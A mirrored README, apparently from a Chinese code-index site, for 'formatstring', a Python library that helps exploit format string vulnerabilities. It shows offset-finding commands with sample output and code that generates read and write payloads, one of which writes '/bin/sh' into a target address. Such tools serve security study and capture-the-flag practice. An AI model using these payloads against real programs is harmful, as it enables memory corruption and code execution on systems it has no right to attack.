倒排索引/搜索引擎>> formatstring>> 返回
项目作者: arthaud

项目描述 :
Format string exploitation helper
高级语言: Python
项目地址: git://github.com/arthaud/formatstring.git
创建时间: 2015-11-01T15:07:39Z
项目社区:https://github.com/arthaud/formatstring
开源协议:MIT License
下载


Formatstring

Formatstring is a python 3 library to help the exploitation of format string vulnerabilities.

Install

formatstring can be installed from PyPI (Python package index) using pip:

  1. pip install formatstring

Examples

  • Generate a pattern to detect the offset of the printed buffer

    1. $ fmtstr_pattern_create 255
    2. ABCDEFGH|%1$p|%2$p|%3$p|%4$p|%5$p|%6$p|%7$p|%8$p|%9$p|%10$p

  • Compute the offset, given the result of the format string on the previous pattern

    1. $ fmtstr_pattern_offset --arch x86_32
    2. Enter the result of the format string on a pattern given by pattern_create:
    3. ABCDEFGH|0x400|0xf776e5a0|0x4|0x4|0x7|0x1b3220|0x43424120|0x47464544|0x31257c48|0x257c7024
    4. Found buffer at offset 8

  • Generate a payload to read at a given address
    ```python
    import sys
    from formatstring import *

settings = PayloadSettings(offset=8, arch=x86_32)

p = ReadPayload(0x8048590)
sys.stdout.buffer.write(p.generate(settings))

  2. * Generate a payload to write at various addresses
  3. ```python
  4. import sys
  5. from formatstring import *
  7. settings = PayloadSettings(offset=8, arch=x86_32)
  9. p = WritePayload()
  10. p[0x8049790] = b'/bin/sh\x00'
  11. p[0x80497a8] = struct.pack('@I', 0x01020304)
  12. sys.stdout.buffer.write(p.generate(settings))

Doc

The full documentation is available here.

Contributors

Author: Maxime Arthaud (maxime@arthaud.me)

License

formatstring is under The MIT License (MIT)